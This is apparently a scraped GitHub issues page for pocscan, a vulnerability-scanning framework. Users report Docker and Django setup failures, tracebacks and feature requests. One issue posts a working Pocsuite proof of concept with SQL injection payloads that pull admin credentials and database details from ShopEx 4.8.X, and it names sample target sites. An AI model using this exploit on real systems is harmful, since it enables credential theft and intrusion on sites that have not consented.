erevus-cn / pocscan Goto Github PK
View Code? Open in Web Editor NEWWill to be a niubility scan-framework
Will to be a niubility scan-framework
[2016-07-07 16:08:27,945: WARNING/Worker-4] global name 'decode' is not defined
[2016-07-07 16:08:27,945: WARNING/Worker-4] global name 'decode' is not defined
[2016-07-07 16:08:27,946: WARNING/Worker-4] global name 'decode' is not defined
[2016-07-07 16:08:27,946: WARNING/Worker-4] global name 'decode' is not defined
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:5555 0.0.0.0:* LISTEN 13/python
tcp 0 0 0.0.0.0:8088 0.0.0.0:* LISTEN 12/python
原来是用butterfly实现交互功能的,之前的版本docker -ti一直失败很郁闷。另外,这个docker镜像docker restart永远挂掉啊。
用Bugscan的框架写了插件,添加到pocs文件夹之后并不会调用进行扫描,这是什么问题呢?
您好,
项目里的docker 源失效了,能重新发一下吗?
使用docker模式安装的话,怎么增加插件。
pip install virtualenv
virtualenv venv
source venv/bin/activate(你会发现在目录前有个(venv)标志)
pip install -r requirements.txt
这里会有2个坑,一个是mysql-python包报错,我们不用管它(pocscan采用sqlite数据库,依赖没去掉)第二个是eventlet=0.18.1版本太低,改成0.18.2成功
apt-get install rabbitmq-server
python manage.py syncdb(记得创建用户密码)
rabbitmqctl start_app
python manage.py celery worker -l info
python manage.py celery flower --broker=amqp://guest:guest@localhost:5672/ /
python manage.py runserver 0.0.0.0:8081
http://127.0.0.1:8081/
try:
for url in result.values():
tmp = urlparse(url)
Req_list(method="GET",
host=tmp.netloc,
uri=tmp.path,
url=url.encode("utf8"),
ua=ua,
cookie=cookie,
).save()
except Exception, e:
pass
return result
实际测试过程中发现,只要有一条数据出现重复,那就停止插入了。最好在循环内处理下异常,保证后续正确数据的加入。
try:
for url in result.values():
try:
tmp = urlparse(url)
Req_list(method="GET",
host=tmp.netloc,
uri=tmp.path,
url=url.encode("utf8"),
ua=ua,
cookie=cookie,
).save()
except Exception, e:
pass
except Exception, e:
pass
return result
不要在意不对齐的细节啦。
开启专家模式,提交任务后,弹窗"已添加",但是"扫描中的任务"页面内容为空
用泄露的bugscan插件 发现还是不行啊..
用docker进行部署的,部署完之后新增了bugscan插件,后来将插件改成777权限,但是无法调用,扫描之后只会调用原来默认的插件
2016-03-21 02:08:18,613 INFO success: syncdb entered RUNNING state, process has stayed up for > than 0 seconds (startsecs)
2016-03-21 02:08:18,614 INFO exited: celery_worker (exit status 2; not expected)
2016-03-21 02:08:18,659 INFO exited: syncdb (exit status 0; expected)
2016-03-21 02:08:18,693 INFO exited: nginx_server (exit status 0; not expected)
2016-03-21 02:08:19,695 INFO spawned: 'celery_worker' with pid 125
2016-03-21 02:08:19,695 INFO success: rabbitma_server entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2016-03-21 02:08:19,696 INFO success: uwsgi_server entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2016-03-21 02:08:19,698 INFO spawned: 'nginx_server' with pid 126
2016-03-21 02:08:19,729 INFO exited: celery_worker (exit status 2; not expected)
2016-03-21 02:08:19,745 INFO exited: nginx_server (exit status 0; not expected)
2016-03-21 02:08:22,201 INFO spawned: 'celery_worker' with pid 143
2016-03-21 02:08:22,204 INFO spawned: 'nginx_server' with pid 144
2016-03-21 02:08:22,218 INFO exited: celery_worker (exit status 2; not expected)
2016-03-21 02:08:22,223 INFO exited: nginx_server (exit status 0; not expected)
2016-03-21 02:08:25,228 INFO spawned: 'celery_worker' with pid 155
2016-03-21 02:08:25,230 INFO spawned: 'nginx_server' with pid 156
2016-03-21 02:08:25,244 INFO exited: celery_worker (exit status 2; not expected)
2016-03-21 02:08:25,248 INFO gave up: celery_worker entered FATAL state, too many start retries too quickly
2016-03-21 02:08:25,248 INFO exited: nginx_server (exit status 0; not expected)
2016-03-21 02:08:26,249 INFO gave up: nginx_server entered FATAL state, too many start retries too quickly
然后访问是500
docker对内核有要求 好多都弄不了 我本地下载安装ubutun都开动不了 daoclud下胶囊机成功过一次 然后就再也没成功过 全500
可否弄个vps下纯环境安装的说明 ubuntu debian centos 都行
在setting中添加CELERY_RESULT_BACKEND='djcelery.backends.database:DatabaseBackend',
不然会导致无法获取result,参考https://github.com/celery/django-celery/issues/227。。
500错误怎么办
问个问题:
已更新至最新版,本机如下操作:
nohup rabbitmq-server -detatched&
nohup python manage.py celery flower --broker=amqp://guest:guest@localhost:5672/ /&
python manage.py syncdb
nohup python manage.py runserver 0.0.0.0:8088&
可以正常登陆,扫描任务可以添加,但是没有进行扫描,没有扫描结果。。。
bugscan的poc也不少,求下一个版本能支持bugscan的标准格式poc。
扫描任务添加后web_tasks_status表中有记录,status=1,但页面上”扫描中的任务“看不到数据,请问是什么原因?
这次把所有执行命令与回显全部记录了下来
第一步:sudo curl -sSL https://get.daocloud.io/docker | sh
[sudo] evil 的密码:
Warning: the "docker" command appears to already exist on this system.
If you already have Docker installed, this script can cause trouble, which is
why we're displaying this warning and provide the opportunity to cancel the
installation.
If you installed the current Docker package using this script and are using it
again to update Docker, you can safely ignore this message.
You may press Ctrl+C now to abort this script.
第三步:
evil@evil:$ sudo docker pull daocloud.io/aber/pocscan:latest$
latest: Pulling from aber/pocscan
87192bdbe00f: Already exists
28e09fddaacb: Already exists
7e15ce58ccb2: Already exists
a3ed95caeb02: Already exists
0d81df0148f0: Already exists
05d55b55325e: Already exists
0047f80c8c96: Already exists
45016dc7e432: Already exists
de527e69a0ad: Already exists
5f0b700d0b2a: Already exists
14da188392b5: Already exists
7ac0f3894e41: Already exists
8ce127628480: Already exists
91d710909cd4: Already exists
64110291099f: Already exists
5581a4d7d95e: Already exists
035e085848f8: Already exists
de94151bda73: Already exists
56c967f48902: Already exists
180cf3799a71: Already exists
Digest: sha256:a85ca19ba62ca9b323ba483761d4dec678a553e6a08b4965ea21e62298b8b86a
Status: Image is up to date for daocloud.io/aber/pocscan:latest
evil@evil:
第四步:
evil@evil:$ sudo chmod -R 0777 pocscan/$
evil@evil:
第五步:
evil@evil:~$ git clone https://github.com/erevus-cn/pocscan.git
正克隆到 'pocscan'...
remote: Counting objects: 827, done.
remote: Total 827 (delta 0), reused 0 (delta 0), pack-reused 827
接收对象中: 100% (827/827), 2.61 MiB | 181.00 KiB/s, 完成.
处理 delta 中: 100% (300/300), 完成.
检查连接... 完成。
第六步:
evil@evil:~$ sudo docker run -d -v pocscan:/www -p 8090:8000 -p 8088:8088 daocloud.io/aber/pocscan:latest
62fea41456bfd47826fe8e4375e5661a10ba92135e841d4c462b85e3fff17f1e
运行ls
evil@evil:$ ls pocscan/$
chtscan pocscan pocscanui requirements.txt web
manage.py pocscan.crx Readme.md screenshots
evil@evil:
最后打开127.0.0.1:8090 还是出现 Internal Server Error 这个提示 别的软件在当前目录下是可以正常运行的 作者说是数据库没有创建 可能是权限问题,实在是不清楚什么地方出问题了
爬虫里面什么也没有 不知道是怎么用的
是要下载那个crx扫么?
有知道的请教下
用了插件也不会扫描。
查看任务状态查看不了,应是权限问题。
爬虫不会爬?
请指导。。你们这个插件怎么用。。
我点了save但是还是没法显示到。
求详细使用。
希望扫描器可以改成想bugscan被动式扫描,不用搭建平台的机器扫描。
你好大神,想问下您的神器预计啥时候再有更新?有两个小问题:
1、好像poc的名称只能是英文,能支持中文不
2、能前台支持上传poc不,现在更新poc都只能去源代码里添加
docker pull daocloud.io/aber/pocscan:1.1.1
1.1.1: Pulling from daocloud.io/aber/pocscan
f15ce52fc004: Pulling fs layer
c4fae638e7ce: Pulling fs layer
a4c5be5b6e59: Pulling fs layer
8693db7e8a00: Pulling fs layer
956891dc3430: Pulling fs layer
1f00d1339496: Pulling fs layer
80f7a0d545b9: Pulling fs layer
17c10ecfb12c: Pulling fs layer
fde079005cb1: Pulling fs layer
5c42e28e1339: Pulling fs layer
8fea0daa7c07: Pulling fs layer
65d414ada1a4: Pulling fs layer
4d75050ec8ba: Pulling fs layer
fc790fb60bb3: Pulling fs layer
660eb15f2c06: Pulling fs layer
e1ab3c5bb4da: Pulling fs layer
cef34003c730: Pulling fs layer
f68977bde126: Pulling fs layer
2f8afae6a03d: Pulling fs layer
d4b1da478962: Pulling fs layer
9c8506f1d290: Pulling fs layer
552994069d20: Pulling fs layer
368fa68d4aba: Pulling fs layer
ac24b6890042: Pulling fs layer
8400d0d00f83: Pulling fs layer
065d773ada26: Pulling fs layer
ec3eb6ebd9ec: Pulling fs layer
aae3298ccf61: Pulling fs layer
1d2ceab73c09: Pulling fs layer
Pulling repository daocloud.io/aber/pocscan
FATA[0008] Error: image aber/pocscan:1.1.1 not found
第一时间试用了下,爬虫与sqlmap功能不理想。
第一:爬虫只爬首页?
测试发现就爬取了下目标url。爬取深度为1......
第二:sqlmap是手动调用的?
自己选中url,点击“To sqlmap“此时sqlmap才会对目标测试吗?是否繁琐了一些?
谢谢。
从扫描结果看,bugscan的poc没有被读取,或者是文件名有特殊要求?
环境是osx的,我安装的osx版本的,运行docker的vbox。
安装说明安装好了,能进login能改密码,但是在运行scan的时候,会报错
如图:
ValueError at /scan/
The view web.views.scan didn't return an HttpResponse object. It returned None instead.
Request Method: GET
Request URL: http://192.168.99.100:8888/scan/
Django Version: 1.8.3
Exception Type: ValueError
Exception Value:
The view web.views.scan didn't return an HttpResponse object. It returned None instead.
Exception Location: /usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py in get_response, line 151
Python Executable: /usr/local/bin/uwsgi
Python Version: 2.7.6
Python Path:
['.',
'',
'/usr/lib/python2.7',
'/usr/lib/python2.7/plat-x86_64-linux-gnu',
'/usr/lib/python2.7/lib-tk',
'/usr/lib/python2.7/lib-old',
'/usr/lib/python2.7/lib-dynload',
'/usr/local/lib/python2.7/dist-packages',
'/usr/lib/python2.7/dist-packages',
'/www']
Server time: 星期日, 20 三月 2016 22:38:38 +0800
图片不知道传上去了没(https://cbu01.alicdn.com/img/ibank/2016/593/308/2853803395_1759034333.jpg)
遇到这样的是docker环境z中没python吗?没接触过docker不懂
root@e2e4896826f7:/# df -h
Filesystem Size Used Avail Use% Mounted on
none 19G 18G 0 100% /
tmpfs 1001M 0 1001M 0% /dev
shm 64M 0 64M 0% /dev/shm
tmpfs 1001M 0 1001M 0% /sys/fs/cgroup
none 233G 214G 20G 92% /www
/dev/sda1 19G 18G 0 100% /etc/hosts
mac ,是因为我本地剩余空间不到20G导致的么,还是bug。run起来之后exec进去df,就是100%,rabbitmq无法启动。
使用过程是严格按照readme来的,用docker启动容器时,出现了这个错误信息
2016-08-30 10:40:08,035 INFO spawned: 'nginx_server' with pid 190
2016-08-30 10:40:08,193 INFO exited: nginx_server (exit status 0; not expected)
2016-08-30 10:40:10,981 INFO spawned: 'nginx_server' with pid 292
2016-08-30 10:40:11,101 INFO exited: nginx_server (exit status 0; not expected)
2016-08-30 10:40:11,549 INFO exited: syncdb (exit status 0; expected)
2016-08-30 10:40:14,152 INFO spawned: 'nginx_server' with pid 305
2016-08-30 10:40:14,235 INFO exited: nginx_server (exit status 0; not expected)
2016-08-30 10:40:15,237 INFO gave up: nginx_server entered FATAL state, too many start retries too quickly
尽管有错误,但这个环境是能跑起来的,不知是不是配置错误,我的系统是ubuntu 14.04 .
Google了下,不知是否和这个有关 serverfault
另,不知官方能否出个不用docker的安装教程,尽管docker方便,但普通的方式更有利于我们这些新手学习下整个部署过程,不失为一个很好地学习机会呀。
另,非常感谢您的开源。
比如tangscan下有一个mongodb未授权访问的py,扫描无法匹配,是py问题?
possuite的pco文件
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class ShopexApi(POCBase):
vulID = '1' # vul ID
version = '1'
author = 'wivd'
vulDate = '2016-3-30'
createDate = '2016-3-30'
updateDate = '2016-3-30'
references = [' ']
name = 'ShopEx-4.8.X api.php注入漏洞 '
appPowerLink = 'tmp'
appName = 'ShopEx'
appVersion = '4.8.X'
vulType = 'SQL Injection'
desc = '''
ShopEx-4.8.X api.php注入漏洞
爆用户和密码
act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(_),concat(0x7c,(select concat(0x245E,username,0x2D3E,userpass,0x5E24) from sdb_operators limit 0,1),0x7c,floor(rand(0)_2))x from information_schema.tables group by x limit 0,1)a)#
爆数据版本
act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(_),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)_2))x from information_schema.tables group by x limit 0,1)a)#
爆数据库
act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(_),concat(0x7c,(select (Select database()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)_2))x from information_schema.tables group by x limit 0,1)a)#
爆数据库用户
act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(_),concat(0x7c,(select (Select user()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)_2))x from information_schema.tables group by x limit 0,1)a)#
'''
samples = ['http://dmdpower.cn','http://eb166.com']
def _attack(self):
return self._verify()
def _verify(self, verify=True):
result = {}
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','Content-Type': 'application/x-www-form-urlencoded','Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'}
vul_url = self.url + "/api.php"
payload = "act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x23,(select concat(username,0x23,userpass) from sdb_operators limit 0,1),0x23,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#"
response =req.post(vul_url, data=payload,headers=headers)
content = response.content
data = re.search(r"(Duplicate entry.*)\#(.*)\#(.*)\#(.*)",content)
if response.status_code == 200 and data != None:
result = {'VerifyInfo':{},'AdminInfo':{}}
result['VerifyInfo']['URL'] = self.url
result['AdminInfo']['Username'] = data.group(2)
result['AdminInfo']['Password'] = data.group(3)
result['VerifyInfo']['data'] =data.group()
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
pocsuite模块可以执行,可以检测到漏洞。而bugscan在调用此poc的时候,会有问题,执行之后没有检测到漏洞,结果中无数据,查看日志,bugscan调用pocsuite的时候类名统一为TestPOC ,把上述脚本修改为class ShopexApi(POCBase): ====> class TestPOC(POCBase): ,register(ShopexApi) ===》 register(TestPOC)后可以正确执行。pocsuite脚本中,由于人员差异,起的类名可能各有差异,建议优化一下pocsuite类名的问题。
POC扫完了,怎么查看有漏洞的?随便找了个有漏洞的dede,也没扫出来啊。API地址怎么设置?作者能否出一个详细的教程。
没安装过这种环境,有点不太明白,博主能否指点一下,先安装xx.再安装xx
bugscan兼容性貌似还是不怎么好啊,我原封不动的bugscan插件是扫不出啥来的,跟没用一样。。但是我改写成pocsuite的,就是可以扫出来
OperationalError at /login/
unable to open database file
Request Method: POST
Request URL: http://192.168.2.114:8090/login/
Django Version: 1.8.3
Exception Type: OperationalError
Exception Value:
unable to open database file
Exception Location: /usr/local/lib/python2.7/dist-packages/django/db/backends/sqlite3/base.py in get_new_connection, line 204
Python Executable: /usr/local/bin/uwsgi
Python Version: 2.7.6
Python Path:
['.',
'',
'/usr/lib/python2.7',
'/usr/lib/python2.7/plat-x86_64-linux-gnu',
'/usr/lib/python2.7/lib-tk',
'/usr/lib/python2.7/lib-old',
'/usr/lib/python2.7/lib-dynload',
'/usr/local/lib/python2.7/dist-packages',
'/usr/lib/python2.7/dist-packages']
如果poc引用了新的module会引发importError,是否有更好的方式可以解决
docker pull daocloud.io/aber/pocscan:latest 默认目录在哪
目录绝对路径怎么写?
这个框架支持批量扫描ip段吗
全新的ubuntu环境
按照搭建的步骤出现错误提示
Internal Server Error
权限指定的目录为下载上面提供的下载连接解压后的文件夹
这个是什么问题
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.